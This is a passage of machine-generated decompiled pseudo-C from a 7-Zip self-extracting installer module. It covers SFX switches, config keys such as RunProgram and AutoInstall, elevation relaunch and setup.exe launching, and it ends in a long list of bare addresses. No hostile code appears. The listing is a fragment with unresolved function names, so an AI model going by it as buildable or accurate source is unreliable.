																				__eflags =  *0x4228d8 - 3;
																				if(__eflags != 0) {
																					_t709 = 0x41da3c;
																					E00404F69(L"SfxVarApiPath", 0x41da3c, __eflags, 0);
																					E00405D92();
																					_t281 = E00404F59();
																					__eflags = _t281;
																					if(_t281 != 0) {
																						__eflags =  *0x4227ca;
																						if( *0x4227ca == 0) {
																							E00407370(0x422868, 0);
																							_t665 =  *0x42286c; // 0x4658ff8
																							E00404F69(L"SfxVarApiPath", _t665, __eflags, 0);
																							E00405D92();
																							E00414803(_t720 + 0x30, 0x41da3c);
																							E00407370(0x422868, _t665);
																							_t666 =  *0x42286c; // 0x4658ff8
																							E004022F7(L"ExecuteOnLoad", _t666, 0x41da3c, _t720 + 0x30, 0x41da3c);
																							_push( *((intOrPtr*)(_t720 + 0x30)));
																							L0041C160();
																						}
																					}
																					E0040830C(0x4227f0);
																					while(1) {
																						_t283 = E00404F59();
																						__eflags = _t283;
																						if(_t283 == 0) {
																							goto L142;
																						}
																						__eflags =  *0x4227c9;
																						if( *0x4227c9 != 0) {
																							goto L142;
																						}
																						_t558 =  *0x422738; // 0x4652520
																						_t350 = E00408B40(_t558, _t283);
																						__eflags = _t350;
																						if(_t350 == 0) {
																							_push( *((intOrPtr*)(_t720 + 0x58)));
																							L0041C160();
																							L165:
																							_push(5);
																							goto L22;
																						}
																						_t283 = GetKeyState(0x10);
																						__eflags = 0x00008000 & _t283;
																						if((0x00008000 & _t283) != 0) {
																							 *0x4227c8 = 0x101;
																						}
																						__eflags =  *0x4228c0;
																						if( *0x4228c0 != 0) {
																							 *0x42245c =  *0x42245c & 0xffffff7f;
																							__eflags =  *0x42245c;
																						}
																						L142:
																						E004147DF(_t283, _t720 + 0x4c);
																						__eflags =  *0x4227c8;
																						if( *0x4227c8 == 0) {
																							L152:
																							__eflags =  *(_t720 + 0x50);
																							 *((char*)(_t720 + 0x14)) = 0;
																							if( *(_t720 + 0x50) == 0) {
																								_t339 = E00404F59();
																								__eflags = _t339;
																								if(_t339 != 0) {
																									E00414864(_t720 + 0x4c, L"ExecuteFile");
																									 *((char*)(_t720 + 0x14)) = 1;
																								}
																								__eflags =  *(_t720 + 0x50);
																								if( *(_t720 + 0x50) == 0) {
																									_t340 = E00404F59();
																									__eflags = _t340;
																									if(_t340 != 0) {
																										E00414864(_t720 + 0x4c, L"RunProgram");
																									}
																								}
																							}
																							__eflags =  *0x4227c8;
																							if( *0x4227c8 != 0) {
																								L168:
																								__eflags =  *0x4228a0;
																								if(__eflags != 0) {
																									E00414839(_t720 + 0x18, 0x42289c);
																									E00405517(_t720 + 0x18);
																									__eflags =  *(_t720 + 0x1c);
																									if( *(_t720 + 0x1c) != 0) {
																										E004148C7(0x42289c, _t720 + 0x18);
																									}
																									_push( *((intOrPtr*)(_t720 + 0x18)));
																									 *0x422740 = 1;
																									L0041C160();
																								} else {
																									E004148C7(0x42289c, E004042B5(L"7ZipSfx.%03x", __eflags));
																									_push( *((intOrPtr*)(_t720 - 0x14)));
																									L0041C160();
																									 *0x422740 = 0;
																								}
																								_t287 =  *0x42289c; // 0x4658d20
																								_t509 =  *0x4228a0; // 0x2c
																								_t162 = _t509 * 2; // 0x438e00
																								_t647 =  *(_t287 + _t162 - 2) & 0x0000ffff;
																								__eflags = _t647 - 0x5c;
																								if(_t647 == 0x5c) {
																									L175:
																									_t510 = _t509 - 1;
																									__eflags = 0;
																									 *0x4228a0 = _t510;
																									 *((short*)(_t287 + _t510 * 2)) = 0;
																									goto L176;
																								} else {
																									__eflags = _t647 - 0x2f;
																									if(_t647 != 0x2f) {
																										L176:
																										__eflags =  *0x4227c9;
																										if( *0x4227c9 != 0) {
																											 *0x422774 =  *0x422774 | 0x00000003;
																											__eflags =  *0x422774;
																										}
																										E00414803(_t720 - 0x20, L"PreExtract");
																										_t289 =  *0x4227c4; // 0x41d648
																										E00401585(_t720 - 0x20,  *_t289 & 0x0000ffff);
																										_t649 = 0;
																										_t292 = E00404F59();
																										__eflags = _t292;
																										if(_t292 != 0) {
																											__eflags =  *0x4227ca;
																											if( *0x4227ca == 0) {
																												E00407370(0x422868, 0);
																												_t658 =  *0x42286c; // 0x4658ff8
																												E00404F69(L"SfxVarApiPath", _t658, __eflags, 0); // executed
																												E00405D92(); // executed
																												E00414803(_t720 + 0x30, _t709);
																												_t328 =  *0x4227c4; // 0x41d648
																												 *(_t720 - 0x24) = _t328;
																												E00407370(0x422868, _t658);
																												_t649 =  *0x42286c; // 0x4658ff8
																												E004022F7(L"PreExtract", _t649,  *(_t720 - 0x24), _t720 + 0x30, _t709); // executed
																												_push( *((intOrPtr*)(_t720 + 0x30)));
																												L0041C160();
																											}
																										}
																										__eflags =  *0x4228d4;
																										if(__eflags != 0) {
																											_t293 = E00408C2E(_t649);
																											__eflags = _t293;
																											if(_t293 != 0) {
																												goto L187;
																											}
																											_t322 = 0x80004005;
																											goto L185;
																										} else {
																											_t322 = E00402CB1(0x42289c, _t649, __eflags);
																											L185:
																											__eflags = _t322;
																											if(_t322 == 0) {
																												L187:
																												_t294 = E00405D92();
																												__eflags =  *0x4227ca;
																												if( *0x4227ca == 0) {
																													L189:
																													E004147DF(E004147DF(_t294, _t720 + 0x40), _t720 + 4);
																													__eflags =  *0x4227c8;
																													if( *0x4227c8 == 0) {
																														E00401B82(_t720 + 0x40);
																													}
																													_t455 = 0;
																													__eflags =  *(_t720 + 0x50);
																													if( *(_t720 + 0x50) != 0) {
																														_t650 =  *0x42289c; // 0x4658d20
																														E004022F7( *((intOrPtr*)(_t720 + 0x4c)), _t650,  *0x4227c4, _t720 + 0x40,  *(_t720 + 0x10));
																														goto L197;
																													} else {
																														__eflags =  *0x422740 - _t455; // 0x1
																														if(__eflags != 0) {
																															L197:
																															__eflags =  *0x4228d8 - _t455; // 0x0
																															if(__eflags == 0) {
																																E00405D92();
																																E004059A3(E00405DE7, L"Shortcut", __eflags,  *0x4227c4, 0xffffffff);
																																SetCurrentDirectoryW( *0x422794);
																																E004059A3(E00405979, L"Delete", __eflags,  *0x4227c4, 0xffffffff);
																																E00405A7A();
																															}
																															_push( *(_t720 + 4));
																															L0041C160();
																															_push( *((intOrPtr*)(_t720 + 0x40)));
																															L0041C160();
																															L201:
																															__eflags =  *0x422468 - 0xffffffff;
																															if( *0x422468 != 0xffffffff) {
																																L204:
																																__eflags =  *0x422468 - _t455; // 0xffffffff
																																if(__eflags > 0) {
																																	_t709 = E00404F59();
																																	__eflags = _t709 - _t455;
																																	if(_t709 != _t455) {
																																		__eflags =  *0x422468 - 0x3e7; // 0xffffffff
																																		if(__eflags > 0) {
																																			 *0x422468 = 0x3e7;
																																		}
																																		E004075CF(_t720 - 0x98, 0, __eflags);
																																		 *((intOrPtr*)(_t720 - 0x98)) = 0x41ebb4;
																																		 *((intOrPtr*)(_t720 - 0x60)) = 0x7d5;
																																		E00407630(E00407941(_t720 - 0x98, 0x11,  *0x422738, _t709, _t455), _t720 - 0x98);
																																	}
																																}
																																L209:
																																__eflags =  *0x4227ca;
																																if( *0x4227ca == 0) {
																																	__eflags =  *0x4228d8 - _t455; // 0x0
																																	if(__eflags == 0) {
																																		_t299 = E00404F59();
																																		__eflags = _t299 - _t455;
																																		if(_t299 != _t455) {
																																			__eflags =  *_t299 - 0x31;
																																			if( *_t299 == 0x31) {
																																				E00414839(_t725, 0x422844);
																																				E00405AA6(_t709);
																																			}
																																		}
																																	}
																																}
																																_push( *((intOrPtr*)(_t720 - 0x20)));
																																L0041C160();
																																_push( *((intOrPtr*)(_t720 + 0x4c)));
																																L0041C160();
																																_push( *((intOrPtr*)(_t720 + 0x58)));
																																L0041C160();
																																_push( *(_t720 - 8));
																																L0041C160();
																																_push( *((intOrPtr*)(_t720 - 0x48)));
																																L0041C160();
																																_push( *((intOrPtr*)(_t720 + 0x24)));
																																L0041C160();
																																_t218 = 0;
																																goto L216;
																															}
																															__eflags =  *0x4227c9;
																															if( *0x4227c9 != 0) {
																																goto L209;
																															}
																															 *0x422468 = 1;
																															goto L204;
																														}
																														_t709 = L"setup.exe";
																														_t656 = E00414787(_t720 - 0x3c, 0x42289c, "\\");
																														E00414864(_t720 + 4,  *((intOrPtr*)(E00414787(_t720 - 0x14, _t312, L"setup.exe"))));
																														_push( *((intOrPtr*)(_t720 - 0x14)));
																														L0041C160();
																														_push( *((intOrPtr*)(_t720 - 0x3c)));
																														L0041C160();
																														_t315 = GetFileAttributesW( *(_t720 + 4));
																														__eflags = _t315 - 0xffffffff;
																														if(_t315 != 0xffffffff) {
																															_t689 =  *0x42289c; // 0x4658d20
																															E00414803(_t720 + 0x30, L"setup.exe");
																															E00402008(_t720 + 0x30, _t689,  *((intOrPtr*)(_t720 + 0x14)), _t720 + 0x40,  *(_t720 + 0x10));
																															_push( *((intOrPtr*)(_t720 + 0x30)));
																															L0041C160();
																															goto L197;
																														}
																														E00405A7A();
																														_push(0xf);
																														_push(0);
																														E00409684(_t656);
																														_push( *(_t720 + 4));
																														L0041C160();
																														_push( *((intOrPtr*)(_t720 + 0x40)));
																														L0041C160();
																														_push( *((intOrPtr*)(_t720 - 0x20)));
																														L0041C160();
																														_push( *((intOrPtr*)(_t720 + 0x4c)));
																														L0041C160();
																														_push( *((intOrPtr*)(_t720 + 0x58)));
																														L0041C160();
																														_t725 = _t725 + 0x1c;
																														L35:
																														_push(7);
																														goto L22;
																													}
																												}
																												__eflags =  *0x422740;
																												if( *0x422740 != 0) {
																													_t455 = 0;
																													__eflags = 0;
																													goto L201;
																												}
																												goto L189;
																											}
																											E00405A7A();
																											_push( *((intOrPtr*)(_t720 - 0x20)));
																											L0041C160();
																											_push( *((intOrPtr*)(_t720 + 0x4c)));
																											L0041C160();
																											_push( *((intOrPtr*)(_t720 + 0x58)));
																											L0041C160();
																											_t725 = _t725 + 0xc;
																											_push(8);
																											goto L22;
																										}
																									}
																									goto L175;
																								}
																							} else {
																								__eflags =  *0x4227c9;
																								if( *0x4227c9 != 0) {
																									goto L168;
																								}
																								_t336 =  *0x42245c; // 0x0
																								__eflags = (_t336 & 0x000000c0) - 0x80;
																								if((_t336 & 0x000000c0) != 0x80) {
																									goto L168;
																								}
																								_t660 =  *0x422748; // 0x56daa0
																								_t546 =  *0x422754; // 0x56da70
																								_t338 = E00408BDB(_t546, _t660);
																								__eflags = _t338;
																								if(_t338 != 0) {
																									goto L168;
																								}
																								_push( *((intOrPtr*)(_t720 + 0x4c)));
																								__eflags =  *0x422784 - _t338; // 0x0
																								if(__eflags == 0) {
																									L0041C160();
																									_push( *((intOrPtr*)(_t720 + 0x58)));
																									L0041C160();
																									goto L165;
																								}
																								L0041C160();
																								continue;
																							}
																						}
																						_t690 =  *0x4227c4; // 0x41d648
																						while(1) {
																							E00414864(_t720 + 0x4c, L"AutoInstall");
																							E00401585(_t720 + 0x4c,  *_t690 & 0x0000ffff);
																							_t346 = E00404F59();
																							__eflags = _t346;
																							if(_t346 == 0) {
																								break;
																							}
																							_t690 =  &(_t690[1]);
																							_t348 =  *_t690 & 0x0000ffff;
																							__eflags = _t348 - 0x30;
																							if(_t348 < 0x30) {
																								L147:
																								__eflags = _t348 - 0x61;
																								if(_t348 < 0x61) {
																									L149:
																									__eflags = _t348 - 0x41;
																									if(_t348 < 0x41) {
																										L151:
																										E00414864(_t720 + 0x4c, L"AutoInstall");
																										goto L152;
																									}
																									__eflags = _t348 - 0x5a;
																									if(_t348 <= 0x5a) {
																										continue;
																									}
																									goto L151;
																								}
																								__eflags = _t348 - 0x7a;
																								if(_t348 <= 0x7a) {
																									continue;
																								}
																								goto L149;
																							}
																							__eflags = _t348 - 0x39;
																							if(_t348 <= 0x39) {
																								continue;
																							}
																							goto L147;
																						}
																						E00409684(0, 0, 0xe,  *((intOrPtr*)(_t720 + 0x4c)));
																						_push( *((intOrPtr*)(_t720 + 0x4c)));
																						L0041C160();
																						_push( *((intOrPtr*)(_t720 + 0x58)));
																						L0041C160();
																						_t725 = _t725 + 0x14;
																						_push(6);
																						goto L22;
																					}
																				}
																				_t358 = E00409E83();
																				goto L128;
																			} else {
																				_t358 = E00409F61();
																				L128:
																				_t703 = _t358;
																				goto L73;
																			}
																		} else {
																			_t360 = E00404F59();
																			_t710 = _t360;
																			__eflags = _t360;
																			if(__eflags == 0) {
																				_t573 = 0x18;
																				_t710 = E00403CE0(_t573);
																			}
																			E004075CF(_t720 - 0x9c, 0, __eflags);
																			 *((intOrPtr*)(_t720 - 0x9c)) = 0x41eaa0;
																			 *((intOrPtr*)(_t720 - 0x64)) = 0x7d6;
																			E00407630(E00407941(_t720 - 0x9c, 0x11,  *0x422738, _t710, 0), _t720 - 0x9c);
																			goto L119;
																		}
																	}
																	 *(_t720 + 0x44) = _t274;
																	 *((short*)( *((intOrPtr*)(_t720 + 0x40)) + _t274 + _t274)) = 0;
																	_t120 = _t685 + 2; // 0x2
																	E00404F69( *((intOrPtr*)(_t720 + 0x40)), _t274 + _t274 + _t120, __eflags, 0);
																	_push( *((intOrPtr*)(_t720 + 0x40)));
																	_t122 = _t720 + 0x3c;
																	 *_t122 =  *(_t720 + 0x3c) + 1;
																	__eflags =  *_t122;
																	L0041C160();
																	_t272 = E00404F59();
																}
																goto L113;
															}
															__eflags =  *0x422774 & 0x00000004;
															if(( *0x422774 & 0x00000004) == 0) {
																goto L107;
															}
															_t367 = E00403F0A();
															__eflags = _t367;
															if(_t367 != 0) {
																goto L107;
															}
															E004147DF(E004147DF(_t367, _t720 + 0x18), _t720 - 0x30);
															E00414803(_t720 + 0x30, E00403022(GetCommandLineW(), _t720 + 0x18));
															E004146E1(_t720 + 4, __eflags, E00414787(_t720 - 0xac, E00414787(_t720 - 0x3c, E004147B1(_t720 - 0x14, "\"", _t720 + 0x18), L"\" -"), L"sfxelevation"), 0x20);
															E00414864(_t720 - 0x30,  *((intOrPtr*)(E0041476B(_t720 + 0x40, _t720 + 4, _t720 + 0x30))));
															_push( *((intOrPtr*)(_t720 + 0x40)));
															L0041C160();
															_push( *(_t720 + 4));
															L0041C160();
															_push( *((intOrPtr*)(_t720 - 0xac)));
															L0041C160();
															_push( *((intOrPtr*)(_t720 - 0x3c)));
															L0041C160();
															_push( *((intOrPtr*)(_t720 - 0x14)));
															L0041C160();
															_t728 = _t725 + 0x14;
															SetProcessWorkingSetSize(GetCurrentProcess(), 0xffffffff, 0xffffffff);
															_push(0);
															_t676 = 2;
															_t383 = E00401C59( *((intOrPtr*)(_t720 - 0x30)), _t676, __eflags);
															_push( *((intOrPtr*)(_t720 + 0x30)));
															__eflags = _t383;
															if(_t383 != 0) {
																L0041C160();
																_push( *((intOrPtr*)(_t720 - 0x30)));
																L0041C160();
																_push( *((intOrPtr*)(_t720 + 0x18)));
																L0041C160();
																_push( *((intOrPtr*)(_t720 + 0x58)));
																L0041C160();
																_t725 = _t728 + 0x10;
																goto L10;
															}
															L0041C160();
															_push( *((intOrPtr*)(_t720 - 0x30)));
															L0041C160();
															_push( *((intOrPtr*)(_t720 + 0x18)));
															L0041C160();
															_push( *((intOrPtr*)(_t720 + 0x58)));
															L0041C160();
															_t725 = _t728 + 0x10;
															_push(0xb);
															goto L22;
														}
														E0040B100(_t720 - 0x158);
														E0040B350(_t720 - 0x158, _t705, lstrlenW(_t705) + _t385);
														E0040B600(_t720 - 0x158, _t720 - 0xcc);
														_t592 = 8;
														memcpy(_t720 - 0xf0, "123456789ABCDEFGHJKMNPQRSTUVWXYZ", _t592 << 2);
														_t725 = _t725 + 0xc;
														asm("movsb");
														_t594 = 0;
														__eflags = 0;
														do {
															_t679 =  *(_t720 + _t594 * 4 - 0xbc);
															 *(_t720 + _t594 * 4 - 0xcc) =  *(_t720 + _t594 * 4 - 0xcc) ^ _t679;
															_t594 = _t594 + 1;
															__eflags = _t594 - 4;
														} while (_t594 < 4);
														_t456 = 0;
														_t696 = 0;
														__eflags = 0;
														do {
															asm("cdq");
															_t679 = _t679 & 0x00000007;
															_t712 =  *(_t720 + (_t696 + _t679 >> 3) - 0xcc) & 0x000000ff;
															_t596 = _t696 & 0x80000007;
															__eflags = _t596;
															if(_t596 < 0) {
																_t596 = (_t596 - 0x00000001 | 0xfffffff8) + 1;
																__eflags = _t596;
															}
															_t714 = _t712 >> _t596 & 0x0000001f;
															__eflags = _t696;
															if(_t696 != 0) {
																asm("cdq");
																_t598 = 0x19;
																_t679 = _t696 % _t598;
																__eflags = _t679;
																if(_t679 == 0) {
																	_t400 = 0x2d;
																	 *((short*)(_t720 + _t456 * 2 - 0x88)) = _t400;
																	_t456 = _t456 + 1;
																	__eflags = _t456;
																}
															}
															 *((short*)(_t720 + _t456 * 2 - 0x88)) =  *((char*)(_t720 + _t714 - 0xf0));
															_t696 = _t696 + 5;
															_t456 = _t456 + 1;
															__eflags = _t696 - 0x7d;
														} while (_t696 < 0x7d);
														__eflags = 0;
														 *((short*)(_t720 + _t456 * 2 - 0x88)) = 0;
														E00414864(0x422708, _t720 - 0x88);
														 *0x422700 = 1;
														_t452 = 0x4227b8;
														goto L101;
													}
													_push( *((intOrPtr*)(_t720 + 0x58)));
													L0041C160();
													_push(0x20);
													goto L22;
												}
												_t637 = L"sfxconfig";
												_t401 = E004056BA(_t684, L"sfxconfig");
												__eflags = _t401;
												if(_t401 == 0) {
													goto L84;
												}
												__eflags =  *_t401 - 0x3a;
												if( *_t401 == 0x3a) {
													_t401 =  &(_t401[1]);
													__eflags = _t401;
												}
												_t603 =  *_t401 & 0x0000ffff;
												__eflags = _t603;
												if(_t603 == 0) {
													goto L119;
												} else {
													while(1) {
														__eflags = _t603 - 0x20;
														if(_t603 > 0x20) {
															break;
														}
														_t401 =  &(_t401[1]);
														_t603 =  *_t401 & 0x0000ffff;
														__eflags = _t603;
														if(_t603 != 0) {
															continue;
														}
														break;
													}
													__eflags =  *_t401;
													if( *_t401 == 0) {
														goto L119;
													}
													_t680 = _t720 + 0x58;
													_t402 = E00405F0F(_t401, _t720 + 0x58);
													__eflags = _t402;
													if(_t402 != 0) {
														goto L119;
													}
													_push(0xa);
													_push(0);
													E00409684(_t680);
													_push( *((intOrPtr*)(_t720 + 0x58)));
													L0041C160();
													_t725 = _t725 + 0xc;
													_push(4);
													goto L22;
												}
											}
											L73:
											_push( *((intOrPtr*)(_t720 + 0x58)));
											L0041C160();
											goto L18;
										} else {
											E00409684(_t636, 1, 7,  *0x422844);
											_t725 = _t725 + 0xc;
											_push(2);
											L22:
											_pop(_t703);
											goto L11;
										}
									}
									__eflags =  *_t701 - 0x3a;
									if( *_t701 == 0x3a) {
										_t614 =  *(_t701 + 2) & 0x0000ffff;
										_t697 = 0x20;
										_t419 = (_t614 | _t697) - 0x61;
										__eflags = _t419;
										if(_t419 == 0) {
											 *0x4228d8 = 2;
											while(1) {
												L57:
												__eflags =  *_t701 - _t697;
												if( *_t701 <= _t697) {
													break;
												}
												_t701 = _t701 + 2;
												__eflags = _t701;
											}
											_t636 = L"sfxconfig";
											_t684 = _t701;
											_t420 = E004056BA(_t701, L"sfxconfig");
											__eflags = _t420;
											if(_t420 == 0) {
												goto L66;
											}
											__eflags =  *_t420 - 0x3a;
											if( *_t420 != 0x3a) {
												L63:
												_t616 =  *_t420 & 0x0000ffff;
												__eflags = _t616;
												if(_t616 != 0) {
													__eflags = _t616 - 0x20;
													if(_t616 > 0x20) {
														goto L64;
													}
													L62:
													_t420 = _t420 + 2;
													__eflags = _t420;
													goto L63;
												}
												L64:
												 *(_t720 + 0x28) =  *(_t720 + 0x28) & 0x00000000;
												 *((short*)( *((intOrPtr*)(_t720 + 0x24)))) = 0;
												_t636 = _t720 + 0x24;
												_t421 = E00403022(_t420, _t720 + 0x24);
												__eflags =  *0x4228d8 - 2;
												_t684 = _t421;
												if( *0x4228d8 != 2) {
													E004148C7(0x422844, _t720 + 0x24);
												}
												goto L66;
											}
											goto L62;
										}
										_t425 = _t419;
										__eflags = _t425;
										if(_t425 == 0) {
											__eflags =  *(_t701 + 4) - 0x63;
											 *0x4228d8 = (0 |  *(_t701 + 4) == 0x00000063) + 3;
											goto L57;
										}
										_t429 = _t425 - 1;
										__eflags = _t429;
										if(_t429 == 0) {
											__eflags = _t614 - 0x44;
											if(_t614 != 0x44) {
												_t701 = _t701 + 4;
												__eflags = _t701;
												L49:
												 *0x4228d4 =  *0x4228d4 & 0x00000000;
												__eflags =  *_t701 - 0x3a;
												if( *_t701 != 0x3a) {
													L52:
													 *0x4228d4 = 0xa;
													L53:
													 *0x4228d8 = 1;
													goto L57;
												}
												_t26 = _t701 + 2; // -2
												_t430 = _t26;
												__imp___wtol(_t430);
												 *0x4228d4 = _t430;
												__eflags = _t430 - 0xe10;
												if(_t430 > 0xe10) {
													goto L52;
												}
												__eflags = _t430;
												if(_t430 != 0) {
													goto L53;
												}
												goto L52;
											}
											__eflags =  *(_t701 + 4) - 0x3a;
											if( *(_t701 + 4) != 0x3a) {
												goto L21;
											}
											_t701 = _t701 + 6;
											while(1) {
												_t431 =  *_t701 & 0x0000ffff;
												__eflags = _t431 - _t697;
												if(_t431 <= _t697) {
													break;
												}
												__eflags = _t431 - 0x3a;
												if(_t431 == 0x3a) {
													break;
												}
												E00401585(0x4228dc, _t431 & 0x0000ffff);
												_t701 = _t701 + 2;
												__eflags = _t701;
											}
											__eflags =  *0x4228e0;
											if( *0x4228e0 != 0) {
												goto L49;
											}
											goto L21;
										}
										_t434 = _t429 - 0xb;
										__eflags = _t434;
										if(_t434 == 0) {
											__eflags =  *(_t701 + 4) - 0x3a;
											if( *(_t701 + 4) != 0x3a) {
												goto L10;
											}
											_t436 = ( *(_t701 + 6) & 0x0000ffff) - 0x31;
											__eflags = _t436;
											if(_t436 == 0) {
												_t703 = 1;
												goto L11;
											}
											_t437 = _t436 - 1;
											__eflags = _t437;
											if(_t437 == 0) {
												_t703 = 0x5ff;
												goto L11;
											}
											_t438 = _t437 - 1;
											__eflags = _t438;
											if(_t438 == 0) {
												_push(0x1f);
												goto L22;
											}
											_t439 = _t438 - 1;
											__eflags = _t439;
											if(_t439 == 0) {
												_t703 = 0x3fff;
												goto L11;
											}
											__eflags = _t439 != 1;
											if(_t439 != 1) {
												goto L10;
											}
											goto L35;
										}
										__eflags = _t434 != 7;
										if(_t434 != 7) {
											goto L21;
										} else {
											_t703 = 0x4f3c;
											goto L11;
										}
									}
									L21:
									_push(0x64);
									goto L22;
								} else {
									_t703 = 1;
									__eflags = 1;
									_push(6);
									_push(1);
									E00409684(_t635);
									L18:
									goto L11;
								}
							} else {
								_t703 = E00401FAC(_t239, _t684);
								goto L11;
							}
						} else {
							E00405CA1(L"sfxversion", _t684, _t736);
							L10:
							_t703 = 0;
							L11:
							_push( *(_t720 - 8));
							L0041C160();
							_push( *((intOrPtr*)(_t720 - 0x48)));
							L0041C160();
							_push( *((intOrPtr*)(_t720 + 0x24)));
							L0041C160();
							_t218 = _t703;
							L216:
							return _t218;
						}
					} else {
						_t445 = _t237 + 2;
						__imp___wtol(_t445);
						_t16 = _t445 - 1; // -1
						if(_t16 <= 0xfffe) {
							 *0x422730 = _t445;
						}
						do {
							_t684 = _t684 + 2;
						} while ( *_t684 > 0x20);
						goto L8;
					}
				}
			}
















































































































                                          0x00406024
                                          0x00406025
                                          0x00406029
                                          0x00406037
                                          0x0040603e
                                          0x0040604a
                                          0x0040605c
                                          0x00406ff3
                                          0x00407001
                                          0x00407009
                                          0x00000000
                                          0x0040606f
                                          0x0040606f
                                          0x00406076
                                          0x00000000
                                          0x00000000
                                          0x0040607f
                                          0x00406086
                                          0x0040609d
                                          0x004060a2
                                          0x004060bd
                                          0x004060c5
                                          0x004060ca
                                          0x004060db
                                          0x004060ed
                                          0x004060fc
                                          0x00406119
                                          0x0040611f
                                          0x00406125
                                          0x00406133
                                          0x0040613f
                                          0x00406146
                                          0x00406173
                                          0x0040617a
                                          0x0040617f
                                          0x00406181
                                          0x004061b3
                                          0x004061b8
                                          0x004061ba
                                          0x004061c7
                                          0x004061ce
                                          0x004061d2
                                          0x004061d7
                                          0x004061d9
                                          0x004061db
                                          0x004061df
                                          0x004061df
                                          0x004061f7
                                          0x004061fd
                                          0x004061ff
                                          0x00406215
                                          0x0040621a
                                          0x00406226
                                          0x00406228
                                          0x0040622a
                                          0x004063bb
                                          0x004063c6
                                          0x004063d3
                                          0x004063da
                                          0x004063df
                                          0x004063e1
                                          0x004063e7
                                          0x004063ed
                                          0x004063f7
                                          0x004063fb
                                          0x00406400
                                          0x00406407
                                          0x0040640c
                                          0x00406411
                                          0x0040641d
                                          0x00406426
                                          0x0040642b
                                          0x0040642d
                                          0x0040642f
                                          0x00406435
                                          0x00406437
                                          0x0040643c
                                          0x0040643c
                                          0x00406448
                                          0x0040644f
                                          0x00406458
                                          0x0040645d
                                          0x00406462
                                          0x00406468
                                          0x0040646d
                                          0x00406473
                                          0x00406473
                                          0x00406483
                                          0x0040648e
                                          0x00406495
                                          0x0040649a
                                          0x0040649c
                                          0x004064c4
                                          0x004064c9
                                          0x004064d3
                                          0x004064d5
                                          0x004064da
                                          0x004064dc
                                          0x004064de
                                          0x004064ed
                                          0x004064f4
                                          0x00406563
                                          0x00406563
                                          0x0040656a
                                          0x00406931
                                          0x00406931
                                          0x00406934
                                          0x00000000
                                          0x00406939
                                          0x00406570
                                          0x00406575
                                          0x004065ad
                                          0x004065ad
                                          0x004065af
                                          0x00000000
                                          0x00000000
                                          0x00406589
                                          0x00406591
                                          0x00406596
                                          0x0040659b
                                          0x004065a3
                                          0x004065a8
                                          0x004065a8
                                          0x004065ab
                                          0x004065ab
                                          0x004065b2
                                          0x004065b4
                                          0x004065b9
                                          0x004065be
                                          0x004065c1
                                          0x004065c3
                                          0x004065d5
                                          0x004065e6
                                          0x004065e8
                                          0x004065ea
                                          0x004066d4
                                          0x004066e0
                                          0x004066e5
                                          0x004066f0
                                          0x004066f5
                                          0x004066fc
                                          0x00406701
                                          0x00406706
                                          0x0040670b
                                          0x0040670f
                                          0x0040684c
                                          0x0040684c
                                          0x00406859
                                          0x004068ab
                                          0x004068ab
                                          0x004068ad
                                          0x004068af
                                          0x00000000
                                          0x00000000
                                          0x00406866
                                          0x00406870
                                          0x00406871
                                          0x00406876
                                          0x00406878
                                          0x004068b3
                                          0x004068b6
                                          0x004068bc
                                          0x004068bc
                                          0x004068c1
                                          0x004068c8
                                          0x004068ca
                                          0x004068ca
                                          0x004068d0
                                          0x004068d6
                                          0x0040693f
                                          0x00406945
                                          0x00406947
                                          0x00406947
                                          0x00406947
                                          0x00406952
                                          0x0040695f
                                          0x00406969
                                          0x0040696b
                                          0x00406970
                                          0x00406975
                                          0x00406975
                                          0x0040697e
                                          0x0040698a
                                          0x0040698f
                                          0x00406991
                                          0x00406994
                                          0x0040699b
                                          0x0040699b
                                          0x004069a0
                                          0x004069a6
                                          0x004069b4
                                          0x004069bb
                                          0x004069c4
                                          0x004069d2
                                          0x004069d7
                                          0x004069e5
                                          0x004069ef
                                          0x004069f1
                                          0x004069f3
                                          0x004069fa
                                          0x004069fe
                                          0x00406a03
                                          0x00406a10
                                          0x00406a15
                                          0x00406a1e
                                          0x00406a25
                                          0x00406a2a
                                          0x00406a38
                                          0x00406a3d
                                          0x00406a40
                                          0x00406a45
                                          0x004069fa
                                          0x00406a4b
                                          0x00406a50
                                          0x00406a57
                                          0x00406a5c
                                          0x00406a5e
                                          0x00000000
                                          0x00000000
                                          0x00406a60
                                          0x00406a67
                                          0x00000000
                                          0x00000000
                                          0x00406a69
                                          0x00406a71
                                          0x00406a76
                                          0x00406a78
                                          0x00406bb8
                                          0x00406bbb
                                          0x00406bc0
                                          0x00406bc1
                                          0x00000000
                                          0x00406bc1
                                          0x00406a80
                                          0x00406a8b
                                          0x00406a8e
                                          0x00406a90
                                          0x00406a90
                                          0x00406a99
                                          0x00406aa0
                                          0x00406aa2
                                          0x00406aa2
                                          0x00406aa2
                                          0x00406aac
                                          0x00406aaf
                                          0x00406ab4
                                          0x00406abb
                                          0x00406b1f
                                          0x00406b1f
                                          0x00406b23
                                          0x00406b27
                                          0x00406b32
                                          0x00406b37
                                          0x00406b39
                                          0x00406b3f
                                          0x00406b44
                                          0x00406b44
                                          0x00406b48
                                          0x00406b4c
                                          0x00406b57
                                          0x00406b5c
                                          0x00406b5e
                                          0x00406b64
                                          0x00406b64
                                          0x00406b5e
                                          0x00406b4c
                                          0x00406b69
                                          0x00406b70
                                          0x00406bfe
                                          0x00406bfe
                                          0x00406c05
                                          0x00406c39
                                          0x00406c41
                                          0x00406c46
                                          0x00406c4a
                                          0x00406c52
                                          0x00406c52
                                          0x00406c57
                                          0x00406c5a
                                          0x00406c61
                                          0x00406c07
                                          0x00406c1a
                                          0x00406c1f
                                          0x00406c22
                                          0x00406c27
                                          0x00406c27
                                          0x00406c66
                                          0x00406c6c
                                          0x00406c72
                                          0x00406c72
                                          0x00406c77
                                          0x00406c7a
                                          0x00406c81
                                          0x00406c81
                                          0x00406c82
                                          0x00406c84
                                          0x00406c8a
                                          0x00000000
                                          0x00406c7c
                                          0x00406c7c
                                          0x00406c7f
                                          0x00406c8e
                                          0x00406c8e
                                          0x00406c95
                                          0x00406c97
                                          0x00406c97
                                          0x00406c97
                                          0x00406ca7
                                          0x00406cac
                                          0x00406cb8
                                          0x00406cc0
                                          0x00406cc2
                                          0x00406cc7
                                          0x00406cc9
                                          0x00406ccb
                                          0x00406cd2
                                          0x00406cd6
                                          0x00406cdb
                                          0x00406ce8
                                          0x00406ced
                                          0x00406cf6
                                          0x00406cfb
                                          0x00406d02
                                          0x00406d05
                                          0x00406d0a
                                          0x00406d1a
                                          0x00406d1f
                                          0x00406d22
                                          0x00406d27
                                          0x00406cd2
                                          0x00406d28
                                          0x00406d2f
                                          0x00406d3d
                                          0x00406d42
                                          0x00406d44
